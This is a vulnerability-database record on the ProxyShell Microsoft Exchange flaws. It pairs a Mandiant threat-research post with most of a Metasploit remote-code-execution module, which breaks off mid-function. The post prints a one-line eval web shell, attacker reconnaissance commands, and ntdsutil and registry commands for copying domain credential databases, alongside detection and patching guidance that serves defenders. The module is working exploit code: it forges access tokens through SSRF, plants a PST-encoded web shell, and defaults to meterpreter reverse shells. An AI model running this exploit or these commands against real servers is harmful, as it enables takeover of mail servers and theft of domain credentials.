CVE-2021-31207 \u2014 Post-auth Arbitrary-File-Write Leads to RCE\n\nOnce the two previous vulnerabilities are exploited successfully, the vulnerability CVE-2021-31207 allows the attacker to write files. As soon as the attacker is able to execute arbitrary PowerShell commands, and the required \u2018Import Export Mailbox\u2019 role is assigned to the impersonated user (which can be achieved by execution of the New-ManagementRoleAssignment cmdlet), the cmdlet New-MailboxExportRequest can be used to export a user\u2019s mailbox to a specific desired path e.g.\n\nNew-MailBoxExportRequest \u2013 Mailbox john.doe@enterprise.corp -FilePath \\\\\\127.0.0.1\\C$\\path\\to\\webshell.aspx \n \n--- \n \nFigure 3: New-MailBoxExportRequest can be used to export payloads\n\nThe use of New-MailboxExportRequest allows the attacker to export target mailboxes where previously created emails with encoded web shells were created. The attacker can export the mailbox to a PST file format with a web file extension, such as ASPX, which allows the attacker to drop a functional web shell, since the encoded attachments in the email are decoded upon write to the PST file format. This is due to the PST file format using permutative encoding, by attaching a pre-encoded payload, upon export the decoded payload is actually written.\n\n#### Observations From Investigations\n\nMandiant responded to intrusions involving ProxyShell exploitation across a range of customers and industries. Examples of proof-of-concept (PoC) exploits developed and released publicly by security researchers could be leveraged by any threat group, leading to adoption by threat groups with varying levels of sophistication. Mandiant has observed the exploit chain resulting in post-exploitation activities, including the deployment of web shells, backdoors, and tunneling utilities to further compromise victim organizations. As of the release of this blog post, Mandiant tracks eight [UNC groups](<https://www.fireeye.com/blog/products-and-services/2020/12/how-mandiant-tracks-uncategorized-threat-actors.html>) exploiting the ProxyShell vulnerabilities. Mandiant anticipates more clusters will be formed as different threat actors adopt working exploits.\n\n##### Exploitation\n\nMandiant has observed the exploitation of Proxyshell starting with the abuse of Autodiscover services to leak known users distinguished name (DN) to then leverage it to leak the administrator security identifier (SID). \n \nBy using the leaked DN and SID, the attacker can create a mailbox that contains a draft email with a malicious payload as an attachment. Afterwards, the mailbox and the contained payload are exported to a web-accessible directory or another directory on the host.\n\nAttempted exploitation of ProxyShell appears to be mostly automated. In some cases, Mandiant observed only partial attacker success, such as the creation of items in mailboxes remotely, but not the exporting of mailboxes and their contained payloads to another directory on the host.\n\nMandiant has observed a wide range of source IP addresses and user agents attempting HTTP requests consistent with the first stage of the ProxyShell exploit chain.\n\n##### Post-Exploitation\n\nUpon successful exploitation of the vulnerabilities, Mandiant observed multiple payloads to gain a foothold in the network including CHINACHOP and BLUEBEAM web shells (see Malware Definitions section). Follow-on actions include execution of internal reconnaissance commands on servers, and deployment of tunneler utilities.\n\n \nFigure 4: BLUEBEAM ASP web shell that was embedded into a PST payload\n\n#### Threat Actor Spotlight: UNC2980\n\nIn August 2021, Mandiant Managed Defense responded to an intrusion leveraging the ProxyShell vulnerability at a US-based university. Mandiant tracks this threat actor as UNC2980.\n\nUNC2980 is a cluster of threat activity tracked since August 2021 and believed to be conducting cyber espionage operations. Mandiant suspects this group to be operating from China currently assessed at low confidence. UNC2980 has been observed exploiting CVE-2021-34473, CVE-2021-34523, CVE-2021-31207, publicly referred to as \"ProxyShell\", to upload web shells for initial access. The group relies on multiple publicly available tools including EARTHWORM, HTRAN, MIMIKATZ, and WMIEXEC post compromise.\n\n#### UNC2980 in Action\n\nUpon gaining access through the exploitation of ProxyShell and deploying a web shell, UNC2980 dropped multiple tools into the victim environment. The following publicly available tools were observed on the initial compromised host: HTRAN, EARTHWORM, and several MIMIKATZ variants.\n\n<script language='JScript' runat='server' Page aspcompat=true>function Page_Load(){eval(Request['cmd'],'unsafe');}</script> \n \n--- \n \nFigure 5: Web shell embedded in PST payload used by UNC2980\n\nApproximately 11 hours and 44 minutes after the ProxyShell exploitation, Mandiant observed post-exploitation activity beginning with multiple Event ID 4648 (A logon was attempted using explicit credentials) events initiated by the process C:\\root\\mimikatz.exe on the initial compromised host. All Event ID 4648 events were associated with two different domain controllers within the environment.\n\nThe group then utilized the utility WMIEXEC to conduct post-exploitation activity. This was primarily observed through the default redirection of command output used by WMIEXEC.\n\ncmd.exe /c whoami > C:\\wmi.dll 2>&1\n\ncmd.exe /c quser > C:\\wmi.dll 2>&1\n\ncmd.exe /c net localgroup administrators > C:\\wmi.dll 2>&1 \n \n--- \n \nFigure 6: Reconnaissance commands executed via WMICEXEC\n\nUNC2980 was observed utilizing several techniques for credential theft once access to a host was established. In one instance, after performing reconnaissance, UNC2980 deployed multiple variants of MIMIKATZ. In another instance, UNC2980 utilized multiple batch files which executed ntdsutil to enumerate snapshots of volumes and were then used to copy ntds.dit and the System hive.\n\nntdsutil snapshot \"List All\" quit quit >>c:\\temp\\1.txt\n\nntdsutil snapshot \"unmount {[GUID]}\" quit quit\n\nnet localgroup administrators\n\nntdsutil snapshot \"activate instance ntds\" create quit quit\n\nntdsutil snapshot \"delete {[GUID] }\" quit quit\n\nntdsutil snapshot \"mount {[GUID]}\" quit quit\n\ncopy c:\\$SNAP_[date]_VOLUMEC$\\windows\\ntds\\ntds.dit c:\\temp\\ntds.dit\n\nreg save hklm\\system c:\\temp\\s.hive \n \n--- \n \nFigure 7: Executed Batch commands\n\n#### Monitoring and Investigating\n\nMandiant recommends monitoring or investigating for compromise on presently or previously vulnerable Exchange servers.\n\n##### Remote Creation of Items in Mailboxes\n\n * Monitor or investigate irregular Exchange EWS logs to identify CreateItem requests, indicating the remote creation of items.\n * Mandiant has observed draft emails created, containing attached encoded web shells, though other items may also be created.\n * Examine logs under \u2018Program Files\\Microsoft\\Exchange Server\\V15\\Logging\\Ews\\\\*\u2019 where:\n * AuthenticatedUser is SYSTEM or a system account\n * SoapAction is CreateItem\n * HttpStatus is 200 (indicating success)\n * Monitor or identify draft emails with encoded attachments.\n * Mandiant has observed draft emails containing .TXT file attachments with encoded content.\n\n##### Remote Unauthenticated PowerShell\n\n * Monitor IIS logs for successful POST requests containing \"/autodiscover/autodiscover.json\" & \"Powershell\".\n * Monitor or investigate the execution of the PowerShell cmdlets \u2018New-ManagementRoleAssignment\u2019 or \u2018New-MailboxExportRequest\u2019.\n * Mandiant has observed \u2018New-ManagementRoleAssignment\u2019 being used to assign mailbox import and export permissions to target mailboxes, followed by \u2018New-MailboxExportRequest\u2019 to export the drafts folder containing emails with encoded web shells attached.\n * Examine PowerShell ScriptBlock, transcription, and module logging where enabled.\n * Examine logs under \u2018Program Files\\Microsoft\\Exchange Server\\V15\\Logging\\CmdletInfra\\Powershell-Proxy\\Cmdlet\\\\*\u2019, especially the cmdlet parameters where:\n * AuthenticatedUser is the name of impersonated mailbox user\n * ProcessName contains w3wp\n * Cmdlet is \u2018New-ManagementRoleAssignment\u2019 or \u2018New-MailboxExportRequest\u2019\n * Mandiant has observed the \u2018CmdletInfra\\Powershell-Proxy\\Cmdlet\u2019 logs recording remote cmdlets and their parameters even when regular PowerShell ScriptBlock/transcription/module logging is not enabled.\n * Mandiant recommends review of these logs on presently or previously vulnerable servers even in cases where no web shell is identified, since attackers may execute any PowerShell cmdlet, utilizing only part of the exploit chain.\n * Examine the \u2018Data\u2019 field in the Audit logs stored under \u2018\\Program Files\\Microsoft\\Exchange Server\\V15\\Logging\\LocalQueue\\Exchange\\\\*\u2019. This field contains JSON data with the Operation Key value containing the executed PowerShell cmdlets.\n\n#### Creation or Use of Web Shells\n\n * Monitor or identify .ASPX files created under the path inetpub\\wwwroot\\aspnet_client written by SYSTEM.\n * Monitor or identify PST files (by header \u2018!BDN\u2019 / 0x2142444E) with web file extensions (commonly .ASPX). These files may be written by MSMailboxReplication.exe or w3wp.exe (the latter can be the result of replication events due to the exploitation of a different Exchange server in the same cluster).\n * Monitor or identify files created by MSMailboxReplication.exe with extensions other than .PST (this binary is used by the New-MailboxExportRequest PowerShell cmdlet).\n * Monitor or identify arbitrary commands spawned by the process w3wp.exe.\n * Monitor or investigate the \u2018MSExchange Management\u2019 Event logs (EID: 1 and EID: 6) to identify \u2018New-MailboxExportRequest\u2019 requests with .ASPX extensions, indicative of a web shell creation attempt.\n\nAdditional attempted or successful exploitation may be identified by analyzing network and IIS logs looking for HTTP requests matching some of the patterns described in this report.\n\n * Requests against /autodiscover/autodiscover.json containing \u2018powershell\u2019, \u2018mapi/nspi\u2019, \u2018mapi/emsmdb\u2019, \u2018/EWS\u2019 or \u2018X-Rps-CAT'.\n * Status codes 200, 301, or 302 indicating successful exploitation.\n * Status codes 400, 401, or 404 indicating attempted exploitation.\n\n#### Prevention and Remediation\n\nMandiant advises all organizations to apply patches [KB5003435](<https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2019-2016-and-2013-may-11-2021-kb5003435-028bd051-b2f1-4310-8f35-c41c9ce5a2f1>) (CVE-2021-31207) and [KB5001779](<https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2019-2016-and-2013-april-13-2021-kb5001779-8e08f3b3-fc7b-466c-bbb7-5d5aa16ef064>) (CVE-2021-34473 and CVE-2021-34523) to vulnerable on-premises Microsoft Exchange servers to mitigate these vulnerabilities being exploited. To verify the current version of on-premises Microsoft Exchange running within an organization, reference this [Microsoft resource](<https://docs.microsoft.com/en-us/exchange/new-features/build-numbers-and-release-dates>).\n\nIf an organization is not able to immediately apply the patches, inbound TCP/80 and TCP/443 traffic to on-premises Exchange servers should be explicitly blocked from the Internet.\n\nAdditionally, Mandiant recommends organizations review their detection and response capabilities, especially on public-facing infrastructure, including:\n\n * Deploying and configuring a File Integrity Monitoring solution to monitor and/or prevent the creation of files, especially on web servers outside of maintenance windows\n * Deploying, configuring, and monitoring an Endpoint Detection and Response solution to alert to and respond to malicious activity effectively\n * Enabling enhanced logging and implementing sufficient log retention periods to support investigations, including:\n * Microsoft Systems Monitor (Sysmon) on Windows Servers\n * PowerShell Module, Script Block, and Transcription Logging\n\n#### Detecting the Techniques\n\n**Product**\n\n| \n\n**Signature** \n \n---|--- \n \nFireEye Endpoint Security\n\n| \n\n * PST FILEWRITE WITH ASP EXTENSION (METHODOLOGY)\n * W3WP.EXE CHILD PROCESS RECON COMMAND (METHODOLOGY)\n * WMICEXEC (FAMILY) \n \nFireEye Network Security\n\n| \n\n * Exploit.PY.ProxyShell\n * Microsoft Exchange CVE-2021-34473 Remote Code Execution\n * FE_Microsoft Exchange CVE-2021-34473 Remote Code Execution \n \nFireEye Email Security\n\nFireEye Detection On Demand\n\nFireEye Malware File Scanning\n\nFireEye Malware File Storage Scanning\n\n| \n\n * FEC_Exploit_PY_ProxyShell\n * FE_Hunting_PSTWithEmbeddedWebShell\n * FE_Exploit_PY_ProxyShell \n \nFireEye Helix\n\n| \n\n * MICROSOFT EXCHANGE [ProxyShell Exploit Attempt]\n * MICROSOFT EXCHANGE [ProxyShell Exploit Success]\n * MICROSOFT EXCHANGE [Post-Auth Arbitrary-File-Write (CVE-2021-31207) - Mailbox Export]\n * MICROSOFT EXCHANGE [Post-Auth Arbitrary-File-Write (CVE-2021-31207) - Certificate Request Export] \n \n#### Mandiant Security Validation Action\n\nOrganizations can validate their security controls using the following actions with Mandiant Security Validation.\n\n**VID**\n\n| \n\n**Name** \n \n---|--- \n \nA101-827\n\n| \n\nApplication Vulnerability - CVE-2021- 34473, ProxyShell Vulnerability Check \n \nA101-829\n\n| \n\nApplication Vulnerability - ProxyShell, Exploitation \n \nA101-839\n\n| \n\nMalicious File Transfer - ProxyShell WebShell, Download \n \n#### Malware Definitions\n\n##### BLUEBEAM\n\nBLUEBEAM (aka. Godzilla) is a publicly available web shell management tool written in JAVA. BLUEBEAM can generate web shell payloads in JSP, ASP[.]NET, and PHP, it also supports AES encryption.\n\nBLUEBEAM contains 20 built-in modules that provide features such as loading additional web shells into memory, shell execution, mimikatz, meterpreter, file compression, and privilege escalation.\n\n##### HTRAN\n\nHTRAN is a publicly available tunneler written in C/C++ that serves as a proxy between two endpoints specified via command line arguments.\n\n##### EARTHWORM\n\nEARTHWORM is a publicly available tunneler utility. It is capable of establishing a tunnel to a SOCKS v5 server and is supported on the following operating systems: Linux, MacOS, and Arm-Linux.\n\n##### CHINACHOP\n\nThe CHOPPER web shell is a simple code injection web shell that is capable of executing Microsoft .NET code within HTTP POST commands. This allows the shell to upload and download files, execute applications with webserver account permissions, list directory contents, access Active Directory, access databases, and any other action allowed by the .NET runtime.\n\nFor more detailed analysis, see our blog post on the China Chopper web shell.\n\n#### Acknowledgements\n\nAlex Pennino, Andrew Rector, Harris Ansari and Yash Gupta\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-03T10:00:00", "type": "fireeye", "title": "PST, Want a Shell? ProxyShell Exploiting Microsoft Exchange Servers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-09-03T10:00:00", "id": "FIREEYE:FC60CAB5C936FF70E94A7C9307805695", "href": "https://www.fireeye.com/blog/threat-research/2021/09/proxyshell-exploiting-microsoft-exchange-servers.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2023-08-07T09:12:52", "description": "This Metasploit module exploits a vulnerability on Microsoft Exchange Server that allows an attacker to bypass the authentication, impersonate an arbitrary user, and write an arbitrary file to achieve remote code execution. By taking advantage of this vulnerability, you can execute arbitrary commands on the remote Microsoft Exchange Server. This vulnerability affects Exchange 2013 CU23 versions before 15.0.1497.15, Exchange 2016 CU19 versions before 15.1.2176.12, Exchange 2016 CU20 versions before 15.1.2242.5, Exchange 2019 CU8 versions before 15.2.792.13, and Exchange 2019 CU9 versions before 15.2.858.9.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-21T00:00:00", "type": "zdt", "title": "Microsoft Exchange ProxyShell Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-08-21T00:00:00", "id": "1337DAY-ID-36667", "href": "https://0day.today/exploit/description/36667", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'winrm'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::CmdStager\n include Msf::Exploit::FileDropper\n include Msf::Exploit::Powershell\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::EXE\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Microsoft Exchange ProxyShell RCE',\n 'Description' => %q{\n This module exploit a vulnerability on Microsoft Exchange Server that\n allows an attacker to bypass the authentication (CVE-2021-31207), impersonate an\n arbitrary user (CVE-2021-34523) and write an arbitrary file (CVE-2021-34473) to achieve\n the RCE (Remote Code Execution).\n\n By taking advantage of this vulnerability, you can execute arbitrary\n commands on the remote Microsoft Exchange Server.\n\n This vulnerability affects Exchange 2013 CU23 < 15.0.1497.15,\n Exchange 2016 CU19 < 15.1.2176.12, Exchange 2016 CU20 < 15.1.2242.5,\n Exchange 2019 CU8 < 15.2.792.13, Exchange 2019 CU9 < 15.2.858.9.\n\n All components are vulnerable by default.\n },\n 'Author' => [\n 'Orange Tsai', # Discovery\n 'Jang (@testanull)', # Vulnerability analysis\n 'PeterJson', # Vulnerability analysis\n 'brandonshi123', # Vulnerability analysis\n 'mekhalleh (RAMELLA S\u00e9bastien)', # exchange_proxylogon_rce template\n 'Spencer McIntyre', # Metasploit module\n 'wvu' # Testing\n ],\n 'References' => [\n [ 'CVE', '2021-34473' ],\n [ 'CVE', '2021-34523' ],\n [ 'CVE', '2021-31207' ],\n [ 'URL', 'https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1' ],\n [ 'URL', 'https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-ProxyLogon-Is-Just-The-Tip-Of-The-Iceberg-A-New-Attack-Surface-On-Microsoft-Exchange-Server.pdf' ],\n [ 'URL', 'https://y4y.space/2021/08/12/my-steps-of-reproducing-proxyshell/' ]\n ],\n 'DisclosureDate' => '2021-04-06', # pwn2own 2021\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => {\n 'RPORT' => 443,\n 'SSL' => true\n },\n 'Platform' => ['windows'],\n 'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86],\n 'Privileged' => true,\n 'Targets' => [\n [\n 'Windows Powershell',\n {\n 'Platform' => 'windows',\n 'Arch' => [ARCH_X64, ARCH_X86],\n 'Type' => :windows_powershell,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\n }\n }\n ],\n [\n 'Windows Dropper',\n {\n 'Platform' => 'windows',\n 'Arch' => [ARCH_X64, ARCH_X86],\n 'Type' => :windows_dropper,\n 'CmdStagerFlavor' => %i[psh_invokewebrequest],\n 'DefaultOptions' => {\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',\n 'CMDSTAGER::FLAVOR' => 'psh_invokewebrequest'\n }\n }\n ],\n [\n 'Windows Command',\n {\n 'Platform' => 'windows',\n 'Arch' => [ARCH_CMD],\n 'Type' => :windows_command,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp'\n }\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],\n 'AKA' => ['ProxyShell'],\n 'Reliability' => [REPEATABLE_SESSION]\n }\n )\n )\n\n register_options([\n OptString.new('EMAIL', [true, 'A known email address for this organization']),\n OptBool.new('UseAlternatePath', [true, 'Use the IIS root dir as alternate path', false]),\n ])\n\n register_advanced_options([\n OptString.new('BackendServerName', [false, 'Force the name of the backend Exchange server targeted']),\n OptString.new('ExchangeBasePath', [true, 'The base path where exchange is installed', 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\V15']),\n OptString.new('ExchangeWritePath', [true, 'The path where you want to write the backdoor', 'owa\\\\auth']),\n OptString.new('IISBasePath', [true, 'The base path where IIS wwwroot directory is', 'C:\\\\inetpub\\\\wwwroot']),\n OptString.new('IISWritePath', [true, 'The path where you want to write the backdoor', 'aspnet_client']),\n OptString.new('MapiClientApp', [true, 'This is MAPI client version sent in the request', 'Outlook/15.0.4815.1002']),\n OptString.new('UserAgent', [true, 'The HTTP User-Agent sent in the request', 'Mozilla/5.0'])\n ])\n end\n\n def check\n @ssrf_email ||= Faker::Internet.email\n res = send_http('GET', '/mapi/nspi/')\n return CheckCode::Unknown if res.nil?\n return CheckCode::Safe unless res.code == 200 && res.get_html_document.xpath('//head/title').text == 'Exchange MAPI/HTTP Connectivity Endpoint'\n\n CheckCode::Vulnerable\n end\n\n def cmd_windows_generic?\n datastore['PAYLOAD'] == 'cmd/windows/generic'\n end\n\n def encode_cmd(cmd)\n cmd.gsub!('\\\\', '\\\\\\\\\\\\')\n cmd.gsub('\"', '\\u0022').gsub('&', '\\u0026').gsub('+', '\\u002b')\n end\n\n def random_mapi_id\n id = \"{#{Rex::Text.rand_text_hex(8)}\"\n id = \"#{id}-#{Rex::Text.rand_text_hex(4)}\"\n id = \"#{id}-#{Rex::Text.rand_text_hex(4)}\"\n id = \"#{id}-#{Rex::Text.rand_text_hex(4)}\"\n id = \"#{id}-#{Rex::Text.rand_text_hex(12)}}\"\n id.upcase\n end\n\n def request_autodiscover(_server_name)\n xmlns = { 'xmlns' => 'http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a' }\n\n response = send_http(\n 'POST',\n '/autodiscover/autodiscover.xml',\n data: soap_autodiscover,\n ctype: 'text/xml; charset=utf-8'\n )\n\n case response.body\n when %r{<ErrorCode>500</ErrorCode>}\n fail_with(Failure::NotFound, 'No Autodiscover information was found')\n when %r{<Action>redirectAddr</Action>}\n fail_with(Failure::NotFound, 'No email address was found')\n end\n\n xml = Nokogiri::XML.parse(response.body)\n\n legacy_dn = xml.at_xpath('//xmlns:User/xmlns:LegacyDN', xmlns)&.content\n fail_with(Failure::NotFound, 'No \\'LegacyDN\\' was found') if legacy_dn.nil? || legacy_dn.empty?\n\n server = ''\n xml.xpath('//xmlns:Account/xmlns:Protocol', xmlns).each do |item|\n type = item.at_xpath('./xmlns:Type', xmlns)&.content\n if type == 'EXCH'\n server = item.at_xpath('./xmlns:Server', xmlns)&.content\n end\n end\n fail_with(Failure::NotFound, 'No \\'Server ID\\' was found') if server.nil? || server.empty?\n\n { server: server, legacy_dn: legacy_dn }\n end\n\n def request_fqdn\n ntlm_ssp = \"NTLMSSP\\x00\\x01\\x00\\x00\\x00\\x05\\x02\\x88\\xa0\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n received = send_request_raw(\n 'method' => 'RPC_IN_DATA',\n 'uri' => normalize_uri('rpc', 'rpcproxy.dll'),\n 'headers' => {\n 'Authorization' => \"NTLM #{Rex::Text.encode_base64(ntlm_ssp)}\"\n }\n )\n fail_with(Failure::TimeoutExpired, 'Server did not respond in an expected way') unless received\n\n if received.code == 401 && received['WWW-Authenticate'] && received['WWW-Authenticate'].match(/^NTLM/i)\n hash = received['WWW-Authenticate'].split('NTLM ')[1]\n message = Net::NTLM::Message.parse(Rex::Text.decode_base64(hash))\n dns_server = Net::NTLM::TargetInfo.new(message.target_info).av_pairs[Net::NTLM::TargetInfo::MSV_AV_DNS_COMPUTER_NAME]\n\n return dns_server.force_encoding('UTF-16LE').encode('UTF-8').downcase\n end\n\n fail_with(Failure::NotFound, 'No Backend server was found')\n end\n\n # https://docs.microsoft.com/en-us/openspecs/exchange_server_protocols/ms-oxcmapihttp/c245390b-b115-46f8-bc71-03dce4a34bff\n def request_mapi(_server_name, legacy_dn)\n data = \"#{legacy_dn}\\x00\\x00\\x00\\x00\\x00\\xe4\\x04\\x00\\x00\\x09\\x04\\x00\\x00\\x09\\x04\\x00\\x00\\x00\\x00\\x00\\x00\"\n headers = {\n 'X-RequestType' => 'Connect',\n 'X-ClientInfo' => random_mapi_id,\n 'X-ClientApplication' => datastore['MapiClientApp'],\n 'X-RequestId' => \"#{random_mapi_id}:#{Rex::Text.rand_text_numeric(5)}\"\n }\n\n sid = ''\n response = send_http(\n 'POST',\n '/mapi/emsmdb',\n data: data,\n ctype: 'application/mapi-http',\n headers: headers\n )\n if response&.code == 200\n sid = response.body.match(/S-[0-9]*-[0-9]*-[0-9]*-[0-9]*-[0-9]*-[0-9]*-[0-9]*/).to_s\n end\n fail_with(Failure::NotFound, 'No \\'SID\\' was found') if sid.empty?\n\n sid\n end\n\n # pre-authentication SSRF (Server Side Request Forgery) + impersonate as admin.\n def run_cve_2021_34473\n if datastore['BackendServerName'] && !datastore['BackendServerName'].empty?\n server_name = datastore['BackendServerName']\n print_status(\"Internal server name forced to: #{server_name}\")\n else\n print_status('Retrieving backend FQDN over RPC request')\n server_name = request_fqdn\n print_status(\"Internal server name: #{server_name}\")\n end\n @backend_server_name = server_name\n\n # get information via an autodiscover request.\n print_status('Sending autodiscover request')\n autodiscover = request_autodiscover(server_name)\n\n print_status(\"Server: #{autodiscover[:server]}\")\n print_status(\"LegacyDN: #{autodiscover[:legacy_dn]}\")\n\n # get the user UID using mapi request.\n print_status('Sending mapi request')\n mailbox_user_sid = request_mapi(server_name, autodiscover[:legacy_dn])\n print_status(\"SID: #{mailbox_user_sid} (#{datastore['EMAIL']})\")\n\n send_payload(mailbox_user_sid)\n @common_access_token = build_token(mailbox_user_sid)\n end\n\n def send_http(method, uri, opts = {})\n ssrf = \"Autodiscover/autodiscover.json?a=#{@ssrf_email}\"\n unless opts[:cookie] == :none\n opts[:cookie] = \"Email=#{ssrf}\"\n end\n\n request = {\n 'method' => method,\n 'uri' => \"/#{ssrf}#{uri}\",\n 'agent' => datastore['UserAgent'],\n 'ctype' => opts[:ctype],\n 'headers' => { 'Accept' => '*/*', 'Cache-Control' => 'no-cache', 'Connection' => 'keep-alive' }\n }\n request = request.merge({ 'data' => opts[:data] }) unless opts[:data].nil?\n request = request.merge({ 'cookie' => opts[:cookie] }) unless opts[:cookie].nil?\n request = request.merge({ 'headers' => opts[:headers] }) unless opts[:headers].nil?\n\n received = send_request_cgi(request)\n fail_with(Failure::TimeoutExpired, 'Server did not respond in an expected way') unless received\n\n received\n end\n\n def send_payload(user_sid)\n @shell_input_name = rand_text_alphanumeric(8..12)\n @draft_subject = rand_text_alphanumeric(8..12)\n payload = Rex::Text.encode_base64(PstEncoding.encode(\"#<script language=\\\"JScript\\\" runat=\\\"server\\\">function Page_Load(){eval(Request[\\\"#{@shell_input_name}\\\"],\\\"unsafe\\\");}</script>\"))\n file_name = \"#{Faker::Lorem.word}#{%w[- _].sample}#{Faker::Lorem.word}.#{%w[rtf pdf docx xlsx pptx zip].sample}\"\n envelope = XMLTemplate.render('soap_draft', user_sid: user_sid, file_content: payload, file_name: file_name, subject: @draft_subject)\n\n send_http('POST', '/ews/exchange.asmx', data: envelope, ctype: 'text/xml;charset=UTF-8')\n end\n\n def soap_autodiscover\n <<~SOAP\n <?xml version=\"1.0\" encoding=\"utf-8\"?>\n <Autodiscover xmlns=\"http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006\">\n <Request>\n <EMailAddress>#{datastore['EMAIL'].encode(xml: :text)}</EMailAddress>\n <AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema>\n </Request>\n </Autodiscover>\n SOAP\n end\n\n def web_directory\n if datastore['UseAlternatePath']\n datastore['IISWritePath'].gsub('\\\\', '/')\n else\n datastore['ExchangeWritePath'].gsub('\\\\', '/')\n end\n end\n\n def build_token(sid)\n uint8_tlv = proc do |type, value|\n type + [value.length].pack('C') + value\n end\n\n token = uint8_tlv.call('V', \"\\x00\")\n token << uint8_tlv.call('T', 'Windows')\n token << \"\\x43\\x00\"\n token << uint8_tlv.call('A', 'Kerberos')\n token << uint8_tlv.call('L', datastore['EMAIL'])\n token << uint8_tlv.call('U', sid)\n\n # group data for S-1-5-32-544\n token << \"\\x47\\x01\\x00\\x00\\x00\\x07\\x00\\x00\\x00\\x0c\\x53\\x2d\\x31\\x2d\\x35\\x2d\\x33\\x32\\x2d\\x35\\x34\\x34\\x45\\x00\\x00\\x00\\x00\"\n Rex::Text.encode_base64(token)\n end\n\n def execute_powershell(cmdlet, args: [])\n winrm = SSRFWinRMConnection.new({\n endpoint: full_uri('PowerShell/'),\n transport: :ssrf,\n ssrf_proc: proc do |method, uri, opts|\n uri = \"#{uri}?X-Rps-CAT=#{@common_access_token}\"\n uri << \"&Email=Autodiscover/autodiscover.json?a=#{@ssrf_email}\"\n opts[:cookie] = :none\n opts[:data].gsub!(\n %r{<#{WinRM::WSMV::SOAP::NS_ADDRESSING}:To>(.*?)</#{WinRM::WSMV::SOAP::NS_ADDRESSING}:To>},\n \"<#{WinRM::WSMV::SOAP::NS_ADDRESSING}:To>http://127.0.0.1/PowerShell/</#{WinRM::WSMV::SOAP::NS_ADDRESSING}:To>\"\n )\n opts[:data].gsub!(\n %r{<#{WinRM::WSMV::SOAP::NS_WSMAN_DMTF}:ResourceURI mustUnderstand=\"true\">(.*?)</#{WinRM::WSMV::SOAP::NS_WSMAN_DMTF}:ResourceURI>},\n \"<#{WinRM::WSMV::SOAP::NS_WSMAN_DMTF}:ResourceURI>http://schemas.microsoft.com/powershell/Microsoft.Exchange</#{WinRM::WSMV::SOAP::NS_WSMAN_DMTF}:ResourceURI>\"\n )\n send_http(method, uri, opts)\n end\n })\n\n winrm.shell(:powershell) do |shell|\n shell.instance_variable_set(:@max_fragment_blob_size, WinRM::PSRP::MessageFragmenter::DEFAULT_BLOB_LENGTH)\n shell.extend(SSRFWinRMConnection::PowerShell)\n shell.run({ cmdlet: cmdlet, args: args })\n end\n end\n\n def exploit\n @ssrf_email ||= 